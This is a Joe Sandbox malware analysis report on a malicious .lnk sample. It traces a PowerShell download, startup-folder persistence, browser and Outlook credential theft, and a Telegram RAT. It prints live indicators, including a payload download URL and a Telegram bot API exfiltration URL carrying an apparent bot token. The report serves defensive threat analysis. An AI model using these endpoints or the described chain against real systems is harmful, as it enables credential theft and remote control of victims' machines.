                Source: Yara matchFile source: 00000006.00000002.4559068186.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.4558808915.00000000028AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.4558808915.0000000002861000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 2072, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: TypeId.exe PID: 5712, type: MEMORYSTR
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\AppData\Roaming\TypeId.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Users\user\AppData\Local\Temp\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Yara matchFile source: 00000006.00000002.4559068186.0000000002529000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.4558808915.00000000028AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 2072, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: TypeId.exe PID: 5712, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected Telegram RAT
                Source: Yara matchFile source: 00000006.00000002.4559068186.0000000002529000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4559068186.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.4558808915.00000000028AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.4558808915.0000000002861000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 2072, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: TypeId.exe PID: 5712, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information111
                Scripting                		Valid Accounts1
                Command and Scripting Interpreter                		111
                Scripting                		1
                DLL Side-Loading                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                File and Directory Discovery                		Remote Services1
                Archive Collected Data                		1
                Web Service                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts2
                PowerShell                		1
                DLL Side-Loading                		112
                Process Injection                		2
                Obfuscated Files or Information                		LSASS Memory13
                System Information Discovery                		Remote Desktop Protocol1
                Data from Local System                		11
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAt2
                Registry Run Keys / Startup Folder                		2
                Registry Run Keys / Startup Folder                		1
                DLL Side-Loading                		Security Account Manager1
                Query Registry                		SMB/Windows Admin Shares1
                Email Collection                		11
                Encrypted Channel                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                Masquerading                		NTDS11
                Security Software Discovery                		Distributed Component Object ModelInput Capture3
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script31
                Virtualization/Sandbox Evasion                		LSA Secrets12
                Process Discovery                		SSHKeylogging24
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts112
                Process Injection                		Cached Domain Credentials31
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                Application Window Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                System Network Configuration Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1592505 Sample: ORDER-202577008.lnk Startdate: 16/01/2025 Architecture: WINDOWS Score: 100 36 reallyfreegeoip.org 2->36 38 api.telegram.org 2->38 40 3 other IPs or domains 2->40 62 Suricata IDS alerts for network traffic 2->62 64 Windows shortcut file (LNK) starts blacklisted processes 2->64 66 Multi AV Scanner detection for submitted file 2->66 72 12 other signatures 2->72 8 powershell.exe 14 20 2->8         started        13 wscript.exe 1 2->13         started        signatures3 68 Tries to detect the country of the analysis system (by using the IP) 36->68 70 Uses the Telegram API (likely for C&C communication) 38->70 process4 dnsIp5 42 87.120.113.91, 49705, 80 UNACS-AS-BG8000BurgasBG Bulgaria 8->42 34 C:\Users\user\AppData\Local\Temp\file.exe, PE32 8->34 dropped 80 Powershell drops PE file 8->80 15 file.exe 15 4 8->15         started        20 conhost.exe 1 8->20         started        82 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 13->82 84 Windows Scripting host queries suspicious COM object (likely to drop second stage) 13->84 22 TypeId.exe 14 2 13->22         started        file6 signatures7 process8 dnsIp9 52 az-ka.com 166.62.28.147, 443, 49706, 49831 AS-26496-GO-DADDY-COM-LLCUS United States 15->52 30 C:\Users\user\AppData\Roaming\TypeId.exe, PE32 15->30 dropped 32 C:\Users\user\AppData\Roaming\...\TypeId.vbs, ASCII 15->32 dropped 54 Machine Learning detection for dropped file 15->54 56 Drops VBS files to the startup folder 15->56 58 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 15->58 60 Injects a PE file into a foreign processes 15->60 24 file.exe 2 15->24         started        28 TypeId.exe 2 22->28         started        file10 signatures11 process12 dnsIp13 44 api.telegram.org 149.154.167.220, 443, 49799, 49976 TELEGRAMRU United Kingdom 24->44 46 checkip.dyndns.com 193.122.6.168, 49752, 80 ORACLE-BMC-31898US United States 24->46 48 reallyfreegeoip.org 104.21.96.1, 443, 49758, 49936 CLOUDFLARENETUS United States 24->48 50 132.226.247.73, 49926, 80 UTMEMUS United States 28->50 74 Tries to steal Mail credentials (via file / registry access) 28->74 76 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 28->76 78 Tries to harvest and steal browser information (history, passwords, etc) 28->78 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                ORDER-202577008.lnk26%ReversingLabsWin32.Trojan.WinLnk
                ORDER-202577008.lnk100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\file.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\TypeId.exe100%Joe Sandbox ML

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://az-ka.com0%Avira URL Cloudsafe
                https://az-ka.com/panel/uploads/Cicycmiv.mp30%Avira URL Cloudsafe
                http://87.120.113.910%Avira URL Cloudsafe
                http://87.120.113.91/chrome.exe0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                az-ka.com
                		166.62.28.147
                		truefalse
                  		unknown
                  reallyfreegeoip.org
                  		104.21.96.1
                  		truefalse
                    		high
                    api.telegram.org
                    		149.154.167.220
                    		truefalse
                      		high
                      checkip.dyndns.com
                      		193.122.6.168
                      		truefalse
                        		high
                        checkip.dyndns.org
                        		unknown
                        		unknownfalse
                          		high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://reallyfreegeoip.org/xml/8.46.123.189false
                            		high
                            http://checkip.dyndns.org/false
                              		high
                              https://az-ka.com/panel/uploads/Cicycmiv.mp3false
                              • Avira URL Cloud: safe
                              		unknown
                              https://api.telegram.org/bot7666772215:AAG3oWDDhgYedd4yOneZp0AStrhY_tgTlTc/sendDocument?chat_id=5830304904&caption=user%20/%20Passwords%20/%208.46.123.189false
                                		high
                                http://87.120.113.91/chrome.exetrue
                                • Avira URL Cloud: safe
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.2133100290.000001A0E2730000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2148952498.000001A0F0F12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2148952498.000001A0F0DCF000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://stackoverflow.com/q/14436606/23354file.exe, 00000003.00000002.2281972613.000000000297C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000002.2301533818.0000000003989000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000002.2315784967.0000000006AC0000.00000004.08000000.00040000.00000000.sdmp, TypeId.exe, 00000008.00000002.2547706995.000000000241C000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://github.com/mgravell/protobuf-netJfile.exe, 00000003.00000002.2301533818.0000000003989000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000002.2315784967.0000000006AC0000.00000004.08000000.00040000.00000000.sdmpfalse
                                      		high
                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.2133100290.000001A0E0F92000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://api.telegram.org/botfile.exe, 00000006.00000002.4559068186.0000000002529000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000028AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://crl.microsoftTypeId.exe, 00000008.00000002.2578986604.0000000005BF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.2133100290.000001A0E0F92000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://go.micropowershell.exe, 00000001.00000002.2133100290.000001A0E1992000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://contoso.com/Licensepowershell.exe, 00000001.00000002.2148952498.000001A0F0DCF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://contoso.com/Iconpowershell.exe, 00000001.00000002.2148952498.000001A0F0DCF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://github.com/mgravell/protobuf-netfile.exe, 00000003.00000002.2301533818.0000000003989000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000002.2315784967.0000000006AC0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                      		high
                                                      https://az-ka.comfile.exe, 00000003.00000002.2281972613.0000000002931000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000008.00000002.2547706995.00000000023D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.2133100290.000001A0E0F92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://checkip.dyndns.org/hfile.exe, 00000006.00000002.4559068186.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.0000000002861000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://github.com/mgravell/protobuf-netifile.exe, 00000003.00000002.2301533818.0000000003989000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000002.2315784967.0000000006AC0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                            		high
                                                            https://stackoverflow.com/q/11564914/23354;file.exe, 00000003.00000002.2301533818.0000000003989000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000002.2315784967.0000000006AC0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                              		high
                                                              https://stackoverflow.com/q/2152978/23354file.exe, 00000003.00000002.2301533818.0000000003989000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000002.2315784967.0000000006AC0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                		high
                                                                http://87.120.113.91powershell.exe, 00000001.00000002.2133100290.000001A0E20B0000.00000004.00000800.00020000.00000000.sdmptrue
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://contoso.com/powershell.exe, 00000001.00000002.2148952498.000001A0F0DCF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.2133100290.000001A0E2730000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2148952498.000001A0F0F12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2148952498.000001A0F0DCF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://api.telegram.org/boti/sendDocument?chat_id=j&caption=napplication/x-ms-dos-executablefile.exe, 00000006.00000002.4559068186.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.0000000002861000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://aka.ms/pscore68powershell.exe, 00000001.00000002.2133100290.000001A0E0D61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2133100290.000001A0E0D61000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000002.2281972613.0000000002931000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000002.4559068186.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000008.00000002.2547706995.00000000023D1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.0000000002861000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://reallyfreegeoip.org/xml/file.exe, 00000006.00000002.4559068186.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000002.4559068186.0000000002514000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.0000000002894000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.0000000002861000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high

                                                                            World Map of Contacted IPs

                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs

                                                                            Public IPs

                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            149.154.167.220
                                                                            		api.telegram.orgUnited Kingdom
                                                                            		62041TELEGRAMRUfalse
                                                                            166.62.28.147
                                                                            		az-ka.comUnited States
                                                                            		26496AS-26496-GO-DADDY-COM-LLCUSfalse
                                                                            87.120.113.91
                                                                            		unknownBulgaria
                                                                            		25206UNACS-AS-BG8000BurgasBGtrue
                                                                            193.122.6.168
                                                                            		checkip.dyndns.comUnited States
                                                                            		31898ORACLE-BMC-31898USfalse
                                                                            104.21.96.1
                                                                            		reallyfreegeoip.orgUnited States
                                                                            		13335CLOUDFLARENETUSfalse
                                                                            132.226.247.73
                                                                            		unknownUnited States
                                                                            		16989UTMEMUSfalse

                                                                            General Information

                                                                            Joe Sandbox version:42.0.0 Malachite
                                                                            Analysis ID:1592505
                                                                            Start date and time:2025-01-16 08:29:40 +01:00
                                                                            Joe Sandbox product:CloudBasic
                                                                            Overall analysis duration:0h 9m 50s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                            Number of analysed new started processes analysed:11
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:0
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample name:ORDER-202577008.lnk
                                                                            Detection:MAL
                                                                            Classification:mal100.troj.spyw.expl.evad.winLNK@11/8@5/6
                                                                            EGA Information:
                                                                            • Successful, ratio: 60%
                                                                            HCA Information:
                                                                            • Successful, ratio: 86%
                                                                            • Number of executed functions: 154
                                                                            • Number of non-executed functions: 21
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .lnk
                                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                            Warnings

                                                                            • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                            • Excluded IPs from analysis (whitelisted): 13.107.246.45, 172.202.163.200
                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                            • Execution Graph export aborted for target TypeId.exe, PID 1088 because it is empty
                                                                            • Execution Graph export aborted for target powershell.exe, PID 6392 because it is empty
                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                            Simulations

                                                                            Behavior and APIs

                                                                            TimeTypeDescription
                                                                            02:30:37API Interceptor18x Sleep call for process: powershell.exe modified
                                                                            02:30:40API Interceptor3066293x Sleep call for process: file.exe modified
                                                                            02:31:06API Interceptor2154247x Sleep call for process: TypeId.exe modified
                                                                            08:30:58AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeId.vbs

                                                                            Joe Sandbox View / Context

                                                                            IPs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            149.154.167.220PI ITS15235 (2).docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                              rDEKONT-1_16_2025__75kb__pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                aASfOObWpW.exeGet hashmaliciousUnknownBrowse
                                                                                  aASfOObWpW.exeGet hashmaliciousUnknownBrowse
                                                                                    Invoice No 1122207 pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      qqnal04.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                        DESCRIPTION.exeGet hashmaliciousDarkCloudBrowse
                                                                                          Inquiry.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                                            17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                                              Company introduction.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                166.62.28.147DRlFlg7OV8.lnkGet hashmaliciousUnknownBrowse
                                                                                                • focusmedica.in/fmlib/IxBABMh0I2cLM3qq1GVv/
                                                                                                2022-04-26_1045.exe.lnkGet hashmaliciousEmotetBrowse
                                                                                                • focusmedica.in/fmlib/IxBABMh0I2cLM3qq1GVv/
                                                                                                87.120.113.91Inquiry List.docGet hashmaliciousDarkVision RatBrowse
                                                                                                • 87.120.113.91/image.exe
                                                                                                009274965.lnkGet hashmaliciousDarkVision RatBrowse
                                                                                                • 87.120.113.91/image.exe
                                                                                                LPO-0048532025.lnkGet hashmaliciousDarkVision RatBrowse
                                                                                                • 87.120.113.91/image.exe
                                                                                                193.122.6.168INQUIRY LIST 292.vbsGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                • checkip.dyndns.org/
                                                                                                JHGFDFG.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                • checkip.dyndns.org/
                                                                                                MV Nicos Tomasos Vessel Parts.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                • checkip.dyndns.org/
                                                                                                Order Details.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                • checkip.dyndns.org/
                                                                                                Contrarre.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                • checkip.dyndns.org/
                                                                                                Company introduction.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • checkip.dyndns.org/
                                                                                                rDEKONT-1_15_2025__75kb__pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • checkip.dyndns.org/
                                                                                                mnXS9meqtB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                • checkip.dyndns.org/
                                                                                                gGI2gVBI0f.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                • checkip.dyndns.org/
                                                                                                ZpYFG94D4C.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                • checkip.dyndns.org/

                                                                                                Domains

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                reallyfreegeoip.orgContrarre.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                • 104.21.48.1
                                                                                                PI ITS15235 (2).docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                • 104.21.80.1
                                                                                                rDEKONT-1_16_2025__75kb__pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 104.21.64.1
                                                                                                JHGFDFG.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                • 104.21.48.1
                                                                                                MV. ASL ROSE - VESSEL'S DESC.pdf.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                • 104.21.48.1
                                                                                                New PO.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                • 104.21.32.1
                                                                                                WOOYANG VENUS_VESSEL_PARTICULARS.doc.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                • 104.21.64.1
                                                                                                order6566546663.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                • 104.21.48.1
                                                                                                Order Details.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                • 104.21.32.1
                                                                                                BNXCXCJSD.jseGet hashmaliciousMassLogger RATBrowse
                                                                                                • 104.21.16.1
                                                                                                checkip.dyndns.comINQUIRY LIST 292.vbsGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                • 193.122.6.168
                                                                                                Contrarre.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                • 132.226.247.73
                                                                                                PI ITS15235 (2).docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                • 132.226.247.73
                                                                                                rDEKONT-1_16_2025__75kb__pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 132.226.247.73
                                                                                                JHGFDFG.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                • 193.122.6.168
                                                                                                MV. ASL ROSE - VESSEL'S DESC.pdf.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                • 193.122.130.0
                                                                                                New PO.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                • 158.101.44.242
                                                                                                WOOYANG VENUS_VESSEL_PARTICULARS.doc.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                • 132.226.8.169
                                                                                                MV Nicos Tomasos Vessel Parts.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                • 193.122.6.168
                                                                                                order6566546663.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                • 132.226.247.73
                                                                                                api.telegram.orgPI ITS15235 (2).docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                • 149.154.167.220
                                                                                                rDEKONT-1_16_2025__75kb__pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 149.154.167.220
                                                                                                aASfOObWpW.exeGet hashmaliciousUnknownBrowse
                                                                                                • 149.154.167.220
                                                                                                aASfOObWpW.exeGet hashmaliciousUnknownBrowse
                                                                                                • 149.154.167.220
                                                                                                Invoice No 1122207 pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 149.154.167.220
                                                                                                qqnal04.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                                • 149.154.167.220
                                                                                                Inquiry.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                                                • 149.154.167.220
                                                                                                17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                                                • 149.154.167.220
                                                                                                Company introduction.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 149.154.167.220
                                                                                                rDEKONT-1_15_2025__75kb__pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 149.154.167.220

                                                                                                ASNs

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                ORACLE-BMC-31898USINQUIRY LIST 292.vbsGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                • 193.122.6.168
                                                                                                JHGFDFG.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                • 193.122.6.168
                                                                                                MV. ASL ROSE - VESSEL'S DESC.pdf.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                • 193.122.130.0
                                                                                                New PO.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                • 158.101.44.242
                                                                                                MV Nicos Tomasos Vessel Parts.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                • 193.122.6.168
                                                                                                Order Details.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                • 193.122.6.168
                                                                                                Execute.ps1Get hashmaliciousMetasploitBrowse
                                                                                                • 158.101.196.44
                                                                                                Invoice No 1122207 pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 158.101.44.242
                                                                                                PDF6UU0CVUO2W-YGVUIO.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                • 193.122.130.0
                                                                                                PO#_1100015533.scrGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                • 193.122.130.0
                                                                                                TELEGRAMRUPI ITS15235 (2).docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                • 149.154.167.220
                                                                                                rDEKONT-1_16_2025__75kb__pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 149.154.167.220
                                                                                                http://shorten.so/fVj82Get hashmaliciousPorn ScamBrowse
                                                                                                • 149.154.167.99
                                                                                                http://hrpibzdeam.xyz/Get hashmaliciousUnknownBrowse
                                                                                                • 149.154.167.99
                                                                                                https://tg.666986.xyz/Get hashmaliciousTelegram PhisherBrowse
                                                                                                • 149.154.167.99
                                                                                                Handler.exeGet hashmaliciousDanaBot, PureLog Stealer, VidarBrowse
                                                                                                • 149.154.167.99
                                                                                                aASfOObWpW.exeGet hashmaliciousUnknownBrowse
                                                                                                • 149.154.167.220
                                                                                                aASfOObWpW.exeGet hashmaliciousUnknownBrowse
                                                                                                • 149.154.167.220
                                                                                                Invoice No 1122207 pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 149.154.167.220
                                                                                                qqnal04.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                                • 149.154.167.220
                                                                                                UNACS-AS-BG8000BurgasBG1737011465bd7d33723603cc9383bb2fe7292ce0ef3c34e2bc9c8f2d2d041e5ca4a18cef04676.dat-decoded.exeGet hashmaliciousXWormBrowse
                                                                                                • 87.120.116.179
